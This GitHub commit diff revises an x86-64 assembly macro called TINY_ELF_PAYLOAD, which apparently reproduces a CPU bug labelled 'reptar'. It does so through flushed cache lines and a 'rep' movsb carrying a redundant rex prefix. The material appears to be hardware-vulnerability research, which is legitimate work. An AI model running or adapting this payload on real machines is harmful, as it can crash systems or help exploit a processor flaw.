-
Notifications
You must be signed in to change notification settings - Fork 419
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
1 parent
65c2f8f
commit a0ab5a0
Showing
1 changed file
with
52 additions
and
55 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -1,63 +1,60 @@ | ||
| %macro TINY_ELF_PAYLOAD 0 | ||
| _start: | ||
| mov rdx, .end_of_program | ||
| times 10 push rdx | ||
| lea rax, [rsp - 0x1000] | ||
| lea r8, [.after_reptar - .loop_only_on_bug] | ||
| mov r10, 0x00007ffff7ffda40 ; after time | ||
| mov r11, .loop_only_on_bug | ||
| xor rdx, rdx | ||
| xor rbx, rbx | ||
| xor r12, r12 | ||
| mov r13, 0x13371337 | ||
| .loop_for_every_iteration: | ||
| jmp r11 | ||
| .loop_only_on_bug: | ||
| _start: | ||
| mov cl, 7 | ||
| lea rax, [rsp - 0x1000] | ||
| lea r8, [.after_reptar - .loop_only_on_bug] | ||
| mov r10, 0x00007ffff7ffda40 ; after time | ||
| xor rbp, rbp | ||
| mov rdx, .end_of_program | ||
| lea r13, [rsp-0x4000] | ||
| mov r15, .skip_reptar_alias | ||
| mov r11, .loop_only_on_bug | ||
| push rdx | ||
| xor rdx, rdx | ||
| align 64 | ||
| times 0x700 nop | ||
| .loop_for_every_iteration: | ||
| .loop_only_on_bug: | ||
| clflush [rax] | ||
| clflush [rax+64] | ||
| mov rsi, rax | ||
| mov rdi, rax | ||
| mov cl, 1 | ||
| add rdx, 1 | ||
| mov r9, rdx | ||
| sub r9, rbp | ||
| cmp r9, 0xb0 ; we are past vdso | ||
| cmova rax, r13 ; this will PF but recover | ||
| align 64 | ||
| times 64-16 nop | ||
| clflush [rax] | ||
| clflush [rsp] | ||
| .reptar: | ||
| rep | ||
| db 0x44; rex.r | ||
| movsb | ||
| .after_reptar: | ||
| rep | ||
| times 64 nop | ||
| jmp r15 | ||
|
|
||
| .reptar_alias: | ||
| nop | ||
| nop | ||
| clflush [rax] | ||
| clflush [rax+64] | ||
| mov rsi, rax | ||
| mov rdi, rax | ||
| mov cl, 1 | ||
| inc rdx | ||
| mov r9, rdx | ||
| sub r9, r12 | ||
| imul r9, r8 | ||
| add r9, r11 | ||
| xor rbx, rbx | ||
| cmp r9, r10 | ||
| setae bl | ||
| imul rbx, 0x4000 | ||
| neg rbx | ||
| add rbx, rsp | ||
| nop | ||
| mov qword [rbx], r13 | ||
| mov qword [rsp], r11 | ||
|
|
||
| .reptar: | ||
| rep | ||
| db 0x44; rex.r | ||
| movsb | ||
| .after_reptar: | ||
| rep | ||
| times 4 nop | ||
| jmp .skip_reptar_alias | ||
|
|
||
| .reptar_alias: | ||
| nop | ||
| nop | ||
| nop | ||
| .after_reptar_alias: | ||
| times 100 nop | ||
| int3 | ||
| .after_reptar_alias: | ||
| times 100 nop | ||
| ; kill | ||
| mov eax, 0 | ||
| mov ebx, 0 | ||
| int 0x80 | ||
|
|
||
| .skip_reptar_alias: | ||
| inc r12 | ||
| jmp .loop_for_every_iteration | ||
| .end_of_program: | ||
| int3 | ||
| int3 | ||
| .skip_reptar_alias: | ||
| inc rbp | ||
| jmp .loop_for_every_iteration | ||
| .end_of_program: | ||
| int3 | ||
| int3 | ||
| %endmacro | ||
|
|
||
| %include "third_party/tiny_elf.asm" |